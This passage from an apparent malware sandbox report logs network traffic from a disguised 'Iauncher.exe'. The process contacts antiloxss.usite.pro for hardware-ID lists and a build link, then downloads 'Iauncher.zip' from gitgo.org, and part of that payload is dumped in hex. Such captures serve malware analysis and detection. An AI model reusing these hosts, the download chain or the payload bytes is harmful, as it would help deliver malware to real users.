                                                                                                                                                  May 1, 2024 20:36:04.410413027 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410629034 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410712004 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.410859108 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411027908 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411091089 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411293030 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411355972 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411456108 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.411608934 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.437783003 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:04.640146017 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.640168905 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.640403032 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:04.640446901 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:05.638952017 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:05.641411066 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:05.845026970 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:06.041215897 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:06.086258888 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:06.201443911 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:06.201544046 CEST4971147232192.168.2.7147.45.47.65

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  May 1, 2024 20:35:42.249021053 CEST5334353192.168.2.71.1.1.1
                                                                                                                                                  May 1, 2024 20:35:42.698146105 CEST53533431.1.1.1192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:43.823007107 CEST6011953192.168.2.71.1.1.1
                                                                                                                                                  May 1, 2024 20:35:43.917963982 CEST53601191.1.1.1192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.993186951 CEST5302953192.168.2.71.1.1.1
                                                                                                                                                  May 1, 2024 20:35:49.434597969 CEST53530291.1.1.1192.168.2.7

                                                                                                                                                  ICMP Packets

                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                  May 1, 2024 20:35:43.920305014 CEST192.168.2.7172.253.122.1014d5aEcho
                                                                                                                                                  May 1, 2024 20:35:44.015465021 CEST172.253.122.101192.168.2.7555aEcho Reply

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  May 1, 2024 20:35:42.249021053 CEST192.168.2.71.1.1.10x6ca9Standard query (0)antiloxss.usite.proA (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:43.823007107 CEST192.168.2.71.1.1.10x8fe6Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:48.993186951 CEST192.168.2.71.1.1.10xda6cStandard query (0)gitgo.orgA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  May 1, 2024 20:35:42.698146105 CEST1.1.1.1192.168.2.70x6ca9No error (0)antiloxss.usite.pro193.109.246.100A (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:43.917963982 CEST1.1.1.1192.168.2.70x8fe6No error (0)google.com172.253.122.101A (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:43.917963982 CEST1.1.1.1192.168.2.70x8fe6No error (0)google.com172.253.122.139A (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:43.917963982 CEST1.1.1.1192.168.2.70x8fe6No error (0)google.com172.253.122.138A (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:43.917963982 CEST1.1.1.1192.168.2.70x8fe6No error (0)google.com172.253.122.113A (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:43.917963982 CEST1.1.1.1192.168.2.70x8fe6No error (0)google.com172.253.122.100A (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:43.917963982 CEST1.1.1.1192.168.2.70x8fe6No error (0)google.com172.253.122.102A (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:49.434597969 CEST1.1.1.1192.168.2.70xda6cNo error (0)gitgo.org172.67.202.98A (IP address)IN (0x0001)false
                                                                                                                                                  May 1, 2024 20:35:49.434597969 CEST1.1.1.1192.168.2.70xda6cNo error (0)gitgo.org104.21.44.179A (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • antiloxss.usite.pro
                                                                                                                                                  • gitgo.org

                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.749699193.109.246.1004436692C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-05-01 18:35:43 UTC98OUTGET /STLprograms/NEW/z-Closing.txt HTTP/1.1
                                                                                                                                                  Host: antiloxss.usite.pro
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-05-01 18:35:43 UTC324INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 01 May 2024 18:35:40 GMT
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Content-Length: 3
                                                                                                                                                  Last-Modified: Mon, 15 Apr 2024 17:02:11 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "661d5d93-3"
                                                                                                                                                  Expires: Tue, 21 May 2024 18:35:40 GMT
                                                                                                                                                  Cache-Control: max-age=1728000
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  2024-05-01 18:35:43 UTC3INData Raw: 31 30 30
                                                                                                                                                  Data Ascii: 100


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.749702193.109.246.1004436692C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-05-01 18:35:44 UTC69OUTGET /STLprograms/NEW/hwid.txt HTTP/1.1
                                                                                                                                                  Host: antiloxss.usite.pro
                                                                                                                                                  2024-05-01 18:35:44 UTC327INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 01 May 2024 18:35:41 GMT
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Content-Length: 183
                                                                                                                                                  Last-Modified: Wed, 17 Apr 2024 21:03:02 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "66203906-b7"
                                                                                                                                                  Expires: Tue, 21 May 2024 18:35:41 GMT
                                                                                                                                                  Cache-Control: max-age=1728000
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  2024-05-01 18:35:44 UTC183INData Raw: 53 2d 31 2d 35 2d 32 31 2d 31 38 37 38 35 36 33 38 36 33 2d 32 36 32 37 33 37 33 32 30 37 2d 33 31 31 34 31 32 37 33 33 33 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 32 34 39 39 36 32 30 37 39 39 2d 32 34 31 35 33 31 36 38 39 31 2d 38 37 34 30 38 34 35 34 36 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 31 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31
                                                                                                                                                  Data Ascii: S-1-5-21-1878563863-2627373207-3114127333-1001S-1-5-21-2499620799-2415316891-874084546-1001S-1-5-21-32078755-17691142541-1048030575-1001S-1-5-21-32078755-1769114254-1048030575-1001


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.749703193.109.246.1004436692C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-05-01 18:35:45 UTC77OUTGET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1
                                                                                                                                                  Host: antiloxss.usite.pro
                                                                                                                                                  2024-05-01 18:35:45 UTC326INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 01 May 2024 18:35:42 GMT
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Content-Length: 44
                                                                                                                                                  Last-Modified: Wed, 24 Apr 2024 18:13:24 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "66294bc4-2c"
                                                                                                                                                  Expires: Tue, 21 May 2024 18:35:42 GMT
                                                                                                                                                  Cache-Control: max-age=1728000
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  2024-05-01 18:35:45 UTC44INData Raw: 53 2d 31 2d 35 2d 32 31 2d 32 32 35 32 33 36 39 36 35 36 2d 31 30 35 37 34 34 30 37 34 30 2d 38 33 34 34 36 37 31 33 2d 31 30 30 31
                                                                                                                                                  Data Ascii: S-1-5-21-2252369656-1057440740-83446713-1001


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.749705193.109.246.1004436692C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-05-01 18:35:46 UTC88OUTGET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1
                                                                                                                                                  Host: antiloxss.usite.pro
                                                                                                                                                  2024-05-01 18:35:47 UTC326INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 01 May 2024 18:35:43 GMT
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Content-Length: 30
                                                                                                                                                  Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "662a75ba-1e"
                                                                                                                                                  Expires: Tue, 21 May 2024 18:35:43 GMT
                                                                                                                                                  Cache-Control: max-age=1728000
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  2024-05-01 18:35:47 UTC30INData Raw: 68 74 74 70 73 3a 2f 2f 67 69 74 67 6f 2e 6f 72 67 2f 49 61 75 6e 63 68 65 72 2e 7a 69 70
                                                                                                                                                  Data Ascii: https://gitgo.org/Iauncher.zip


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.749706193.109.246.1004436692C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-05-01 18:35:47 UTC88OUTGET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1
                                                                                                                                                  Host: antiloxss.usite.pro
                                                                                                                                                  2024-05-01 18:35:48 UTC325INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 01 May 2024 18:35:44 GMT
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Content-Length: 12
                                                                                                                                                  Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "662a75ba-c"
                                                                                                                                                  Expires: Tue, 21 May 2024 18:35:44 GMT
                                                                                                                                                  Cache-Control: max-age=1728000
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  2024-05-01 18:35:48 UTC12INData Raw: 49 61 75 6e 63 68 65 72 2e 65 78 65
                                                                                                                                                  Data Ascii: Iauncher.exe


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.749708193.109.246.1004436692C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-05-01 18:35:48 UTC91OUTGET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1
                                                                                                                                                  Host: antiloxss.usite.pro
                                                                                                                                                  2024-05-01 18:35:48 UTC325INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 01 May 2024 18:35:45 GMT
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Content-Length: 12
                                                                                                                                                  Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "662a75ba-c"
                                                                                                                                                  Expires: Tue, 21 May 2024 18:35:45 GMT
                                                                                                                                                  Cache-Control: max-age=1728000
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  2024-05-01 18:35:48 UTC12INData Raw: 49 61 75 6e 63 68 65 72 2e 7a 69 70
                                                                                                                                                  Data Ascii: Iauncher.zip


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.749710172.67.202.984436692C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-05-01 18:35:49 UTC71OUTGET /Iauncher.zip HTTP/1.1
                                                                                                                                                  Host: gitgo.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-05-01 18:35:50 UTC681INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 01 May 2024 18:35:50 GMT
                                                                                                                                                  Content-Type: application/zip
                                                                                                                                                  Content-Length: 418397
                                                                                                                                                  Connection: close
                                                                                                                                                  Last-Modified: Thu, 25 Apr 2024 15:31:32 GMT
                                                                                                                                                  ETag: "6625d-616ed7b506247"
                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCLdCLfavCmoVAMJjOnInGiyjOd0OPuKjVniCyLiRcs5R%2B%2BEp9QBZOfiFZvC3ul5tMl%2FPis6PAC%2FO0nHg6S1MKDLH37uyY2W7nFZMOMtz5fI6vVVCTk2Ya%2BGBII%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 87d1dfa45d0b0854-IAD
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  2024-05-01 18:35:50 UTC688INData Raw: 50 4b 03 04 14 00 00 00 08 00 a5 93 99 58 7b a5 c2 5b bf 61 06 00 00 b6 07 00 0c 00 00 00 49 61 75 6e 63 68 65 72 2e 65 78 65 e4 fd 7d 7c 54 c5 f5 38 8e df dd bd 49 2e 64 c3 5d 60 81 08 51 22 ac 8a 06 35 b2 a8 89 1b 70 13 d8 24 5a 82 1b 62 76 89 98 c4 aa a4 e9 fa 84 70 2f 0f 4a 20 78 b3 9a 9b f1 2a 6d b5 b5 ad b6 fa b6 b6 fa b6 fd 94 b6 2a f8 bc c9 d2 3c 20 f2 a4 6f c5 a2 36 58 aa 13 37 6a 78 30 d9 40 c8 fd 9d 33 77 77 b3 60 50 fb 79 bf be df 3f be 3f 34 7b ef 9d 39 33 73 e6 cc cc 99 73 ce cc 9c 29 bb 61 33 67 e1 38 8e 87 3f 5d e7 b8 6d 9c f1 cf cd 7d f7 bf 28 fc 8d 9b fe ca 38 ee 85 31 6f 9f bb cd b4 e8 ed 73 af af ff f1 aa ec 15 2b ef fa d1 ca 1f de 91 7d cb 0f ef bc f3 2e 29 fb e6 e5 d9 2b e5 3b b3 7f 7c 67 f6 c2 eb 2a b2 ef b8 eb d6 e5 97 64 64 8c 75
                                                                                                                                                  Data Ascii: PKX{[aIauncher.exe}|T8I.d]`Q"5p$Zbvp/J x*m*< o6X7jx0@3ww`Py??4{93ss)a3g8?]m}(81os+}.)+;|g*ddu
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: e7 65 63 70 7d 0d 64 aa 5e 3e 17 de 9f 9e 05 3f 6a c6 6c f8 a5 cb b0 94 da 9a f0 cb eb f1 eb 99 cb 00 70 25 96 be 80 95 5e 5f 8f ef 57 b2 f7 9d f1 7f 64 a1 83 af 20 1f 00 66 b3 95 5b 78 4e b5 d0 a5 e5 80 90 e4 c8 aa f2 69 6b 6d ea 02 1e 70 fc 3c 03 82 8a 33 c9 22 87 5d 2d c9 24 0b f8 da 1a 55 80 87 5a ca b3 5f 7c 6f 77 5b 39 f6 c8 e0 48 78 59 9b 95 d3 25 87 00 29 04 fa ea 4c 8e 6b a5 d3 c3 58 d4 3c ec f7 2b 05 2f 45 46 54 15 0e 86 24 78 ff d4 8b ef ce 10 83 d0 4a 67 ba 3a c5 fb e7 9c cb 71 e5 74 27 c6 90 ce 60 97 34 56 2b 9c a9 74 77 ab a5 43 e1 9e 0b 7e cd 71 81 d9 f4 cf 18 a9 72 aa 9b 57 dd 42 5d 87 db 6a 32 85 2b c8 8d 0e 6b 25 e9 79 59 d7 f5 8d ae 0f d6 dc 10 10 97 ba f6 af 99 5a 01 d8 d8 d4 6a 5b a5 ea b1 53 3f 20 a4 6c b7 b6 f3 39 5c 64 ae cf 5f ee
                                                                                                                                                  Data Ascii: ecp}d^>?jlp%^_Wd f[xNikmp<3"]-$UZ_|ow[9HxY%)LkX<+/EFT$xJg:qt'`4V+twC~qrWB]j2+k%yYZj[S? l9\d_
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 59 6e 64 6d 82 e6 7e 84 cf f3 62 8e f0 e9 88 e5 5c 7b 16 32 8d 17 58 6a 22 10 37 ef 55 9b d8 07 c0 14 94 b3 fc 9e c4 fc 6e 37 f2 73 f6 47 ce ff 8e 1c 33 18 64 26 f1 f2 44 40 28 06 0e 2d ba 82 b5 c0 85 c0 4a 19 db be de b1 56 e3 d7 7a 97 94 03 cc 2c 48 f6 5e 66 12 22 92 c3 cb 90 51 6e c9 e6 94 5b 1c 9c b7 dc 17 c7 44 6d 32 2a 78 20 93 21 84 3d 81 8e 07 d9 12 5e e6 d2 4b e0 05 fa d6 ad a4 1d b9 b8 73 27 bd f6 1a 84 5a da 96 6d 30 04 6d b1 8d 1e 3a 0b 99 85 8f 9e 7b 0d e3 15 6c ce 6f 5c 9b c1 c9 53 94 90 cd cb f8 49 db 80 31 d4 65 7e 38 14 31 cf 09 19 83 5a e9 b5 ea b2 8d 71 3d cf 31 6f c0 04 8c 5e f4 87 80 df 0f d5 89 13 21 84 fe 11 a6 a0 3a e2 19 52 b6 db bb c2 3e 3f cb 2a e3 4d 28 cd a4 ad 35 f9 a9 e9 d1 d8 5c 14 ec 97 a6 04 75 69 5c 6c 3a f9 fc 76 36 9d
                                                                                                                                                  Data Ascii: Yndm~b\{2Xj"7Un7sG3d&D@(-JVz,H^f"Qn[Dm2*x !=^Ks'Zm0m:{lo\SI1e~81Zq=1o^!:R>?*M(5\ui\l:v6
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: b5 4b 9a 48 ef ce c2 61 0a 3d 23 ff c6 5c ab f8 48 38 62 fe 9b a9 b9 96 47 dd 65 59 12 e6 f3 18 e6 0b 13 f9 8f d6 69 80 84 65 87 bc 74 13 aa a1 9e 43 d0 47 a0 e3 20 e3 fe f5 49 d4 4b 0f d1 7b 6c d8 53 86 48 bb 91 91 f3 ed 1a fa ca d5 f1 de 71 98 2c e6 01 29 41 69 b5 d1 72 ec 65 1b 78 4e b2 82 16 b7 9a a7 f7 5f 6d 88 66 3d 79 10 81 d5 de 60 03 2a ed 87 3c a4 31 fa 6a 90 cf 08 c4 eb ab ed f4 65 7c e9 48 7d 16 62 40 90 1b 03 f9 a5 12 53 c0 a4 db b0 7d fd 3e 3a d9 81 19 cf e6 aa 30 dd 6c da 82 e0 4e 5d dd 30 3b 7f 83 03 83 1c 74 0d 06 a9 1b 1c f9 1b b2 30 20 8b d6 19 01 59 f9 1b ec 18 60 a7 95 46 80 3d 7f 83 d5 28 7d a1 11 60 cd df c0 63 00 4f 9d 46 00 4f 76 d5 d6 f4 5c 8e ea f1 18 62 62 63 4f 88 8f bd 9b 84 b0 56 c8 77 98 b0 cf 78 e9 e5 01 b4 37 91 6b 90 00
                                                                                                                                                  Data Ascii: KHa=#\H8bGeYietCG IK{lSHq,)AirexN_mf=y`*<1je|H}b@S}>:0lN]0;t0 Y`F=(}`cOFOv\bbcOVwx7k
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 57 09 c4 8d b1 18 83 2c 8a 0d d5 a4 b6 5f 6c 7a 16 9b de 94 53 f8 ac 80 cf 99 85 c8 49 b5 72 53 45 cb f4 c6 13 8b 24 be f9 ac 48 7a bb e9 9a ba 0e f3 15 73 95 36 33 e9 dc 74 90 03 36 b8 0c 5a 92 c7 d6 dd 72 57 64 32 bc 0b d0 17 52 5a 4a 4c 91 31 a1 6e 4b ff 1e 47 b6 75 69 b3 19 da b5 bd c8 04 12 45 9f 5e c8 1b e4 29 d0 3c 7d 15 3e bf 97 7c 40 1f cc 62 4a f1 bd d0 e9 b7 7b 9f 81 7f f4 df 59 c8 51 02 e9 55 da bd 99 a4 ef e8 33 cc d6 ce 73 9b 7a d1 c6 18 b7 ec 36 39 9a e0 ab a2 12 28 f0 01 bd ef 4f 68 45 d5 a0 4a 5e fa 07 4c 0d 89 21 cf f5 8e fa a3 cf 38 f5 37 90 c3 34 be c6 cc 5d 9c 7a af a0 de 0b 7a b7 5d b6 00 53 37 92 48 59 cc 3e e7 f6 82 88 f3 c8 17 d0 12 0b 30 62 ad d7 5f bf 1d 7b d3 eb 2c c8 a6 19 45 42 e8 4e 0c fd c3 17 a8 c1 cf 52 17 d8 e3 59 4b e7
                                                                                                                                                  Data Ascii: W,_lzSIrSE$Hzs63t6ZrWd2RZJL1nKGuiE^)<}>|@bJ{YQU3sz69(OhEJ^L!874]zz]S7HY>0b_{,EBNRYK
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: ed a2 c6 9f a5 96 d8 48 c7 6a 33 49 f3 69 73 05 50 e3 ac 15 5e 1f bd 62 69 6c 07 c9 39 1c e9 a8 89 4c 84 a1 d0 ee 81 a9 77 37 ae bb 57 d0 a9 54 d7 6b 97 55 1b f2 36 64 6d 3d 35 eb 8b be 91 35 26 83 ec 7d f4 35 ee d4 8c 31 a2 dd 03 b3 df 6e 28 a2 82 ce f9 2c 29 63 e2 11 60 dc 2a dd 53 d4 42 2b b9 c6 e6 9b d9 29 2d 6c 6c b0 72 f2 82 fe 56 5e 4a 7b 23 1b e5 4e 5b 7f ab f9 8d 3c 78 db e6 85 1f 71 61 9f e6 89 06 4c 5e 9a c9 cc c7 5e 1f 0e d2 7f f7 42 77 c8 63 dd e1 90 37 32 a6 06 15 05 b6 e8 9f 53 15 23 ac 8f f4 c5 6c 5f b9 ca 3a bb 48 f6 c2 db 78 7d 85 cd a7 df 6d 5b 42 5f f9 8c 2d 4e 60 07 44 3d 26 fe 47 37 97 1b 6b 0e 50 21 5c e6 43 ca 27 e2 a4 53 e3 04 6c 33 66 53 c9 f9 18 fb 49 4c 8e 01 de 26 c0 38 29 e5 e1 bb 0e 46 7a 18 ca 63 7b 8a 32 3e d7 75 04 c0 22
                                                                                                                                                  Data Ascii: Hj3IisP^bil9Lw7WTkU6dm=55&}51n(,)c`*SB+)-llrV^J{#N[<xqaL^^Bwc72S#l_:Hx}m[B_-N`D=&G7kP!\C'Sl3fSIL&8)Fzc{2>u"
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 90 64 7d 6e 5e 50 17 9b 1e 86 86 04 39 b0 9b 5e f9 2f 5d 6f 6c 38 c4 49 6b 95 e5 94 63 6a 58 1a 08 9e de b9 ce 7d 01 be 56 89 ea e2 c2 f7 d5 4a 1a 5f 52 ea 4d 5e 52 aa 4d ef 48 2c 29 0d a6 47 fd 64 07 ad 82 8e b8 6d f9 d5 b1 25 25 00 21 50 70 25 4d 68 6e b1 25 a5 68 fa 3a 6b fa 71 3f bd e8 6b d4 0f bb 69 c3 21 a8 72 3b 3d 7b 26 37 a2 c0 91 4a a1 02 65 e8 eb 6c ae 1d 2b 6f 40 51 ba da ca 44 e9 b9 20 4a a7 9d 22 4a e7 ec d0 e6 7a 0b 35 be a6 dc e7 a5 f7 7f 8d 7b b9 65 9b 8f de 69 36 14 78 10 aa 51 a2 8b 49 eb 4b 98 b8 fe fa 3f 0c a9 da ca d1 e7 8f c6 94 05 6c 3c 55 e8 70 f3 5c b7 b1 dc a0 34 58 4d f2 78 52 26 04 26 d5 4b a8 8b 5c f5 4f 5d 8f 4c 00 aa d3 4a 1e 77 a9 e3 76 8d af 41 ac 01 b1 1c 05 f4 6d f5 b1 75 8a 72 52 6e 73 95 db 57 4d 43 c9 59 2b 32 a9 85
                                                                                                                                                  Data Ascii: d}n^P9^/]ol8IkcjX}VJ_RM^RMH,)Gdm%%!Pp%Mhn%h:kq?ki!r;={&7Jel+o@QD J"Jz5{ei6xQIK?l<Up\4XMxR&&K\O]LJwvAmurRnsWMCY+2
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 8e 94 03 a2 c1 f7 ec e1 35 b5 31 2c d8 be 94 07 8f c3 d8 c4 fc e8 9f 90 b1 9f 87 af 48 96 21 ba e3 38 22 84 5d 97 ee c4 ed dd d5 42 c0 5c 8f cb 1d aa 85 3e 52 07 8f 05 3c d6 5e 3a 07 b4 cf 07 10 e0 5e fe 65 3c 5c 40 fa 3a 16 08 38 36 71 a9 32 62 a5 b7 41 9c 72 8b 80 f0 f4 59 84 03 89 7d 81 15 12 8e f5 d2 c2 5f e2 de a6 05 56 ec d3 8c d7 b2 65 e2 fe c0 6c c8 f3 2f 0b 58 87 a7 d7 e1 38 48 a3 8f e0 a3 84 a7 cb 31 8b 52 c1 19 0a 76 89 8f 84 d4 12 01 26 a1 39 15 34 85 ed 40 77 86 ea f2 f9 55 0d 99 e4 3d d2 de fa b9 45 e9 4e 13 5f 5a 74 95 55 7c be d5 19 6a 86 97 62 d0 ea 01 b5 f5 1f 2c c3 1d 69 06 1d 88 c7 0e c3 c1 e7 ec cf 5f 21 48 93 ea 88 c7 fa 8a 8e 66 59 57 db 9a 9c 66 93 33 e4 8e cc d1 2a 87 a0 f7 2f f1 c1 34 59 1e 30 69 65 56 60 c2 b9 fa 24 c1 0d bc 20
                                                                                                                                                  Data Ascii: 51,H!8"]B\>R<^:^e<\@:86q2bArY}_Vel/X8H1Rv&94@wU=EN_ZtU|jb,i_!HfYWf3*/4Y0ieV`$
                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: cd b9 3e fa c5 f8 ff 4d 35 b6 db 46 aa 01 e5 3d 39 fe db ab 01 fc 5e 19 14 57 17 35 ce f3 be 0a 22 8f 94 0f 33 b4 1d 64 3d db 02 94 41 8a 2d 03 96 7f 6a 25 82 a5 55 e9 8e 92 3d a4 d3 d5 07 7a 7d 9f eb 1f 6b cc e4 ad 72 dc e5 fa 13 66 71 b1 d5 d6 18 92 8b d2 3b 2b d9 1c 0c 43 4d b9 17 74 fd 1b 1a ef 9d cf 49 d7 13 cb 9b c8 29 fd 64 85 35 c1 b8 de d2 df ab 73 45 a5 95 e4 de 3c 94 85 b3 35 cf 7e dc a3 48 76 79 71 ab b3 b6 c0 ed 1d e1 70 ce ae 9c 56 69 3a 0a 03 67 a3 30 20 cf 6b fe c1 fc 2d 26 e0 ee b5 35 ce b7 97 d1 36 1b 6e 33 80 30 22 ef 87 c4 39 7d d2 44 7d d5 22 1f 2e 84 fe e4 19 86 a6 ab 4f 1e 83 a8 80 c8 14 e9 9c 13 8a 6c 47 be c8 6c ef 68 77 5a 63 23 ed 39 61 e0 91 2e 8f 75 a5 05 78 05 ae e0 42 7d 45 cd 7e 56 4e 1f d9 65 69 cb 79 ab b0 dc bb 84 3e 31
                                                                                                                                                  Data Ascii: >M5F=9^W5"3d=A-j%U=z}krfq;+CMtI)d5sE<5~HvyqpVi:g0 k-&56n30"9}D}".OlGlhwZc#9a.uxB}E~VNeiy>1
